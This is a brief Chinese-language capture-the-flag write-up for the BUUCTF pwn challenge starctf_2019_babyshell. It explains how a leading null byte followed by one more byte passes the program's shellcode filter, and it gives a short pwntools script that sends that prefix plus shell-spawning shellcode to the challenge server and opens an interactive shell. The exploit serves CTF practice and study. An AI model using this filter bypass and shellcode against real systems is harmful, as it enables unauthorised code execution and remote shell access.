[BUUCTF-pwn]——starctf_2019_babyshell
学到了, 又学到了FMYY师傅太强了
只需要通过\x00绕过检查, 同时执行我们输入的shellcode就好
**\x00B后面加上一个字符, 对应一个汇编语句。**所以我们可以通过\x00B\x22、\x00B\x00等等来绕过那个检查
当然其他汇编肯定也可以大家可以自己找找哈,看到别的师傅好像\x00J\x00也是可以滴
from pwn import *
context.arch = "amd64"
p = remote("node3.buuoj.cn",27993)
#p = process("./starctf_2019_babyshell")
payload = '\x00B3' + asm(shellcraft.sh())
p.sendline(payload)
p.interactive()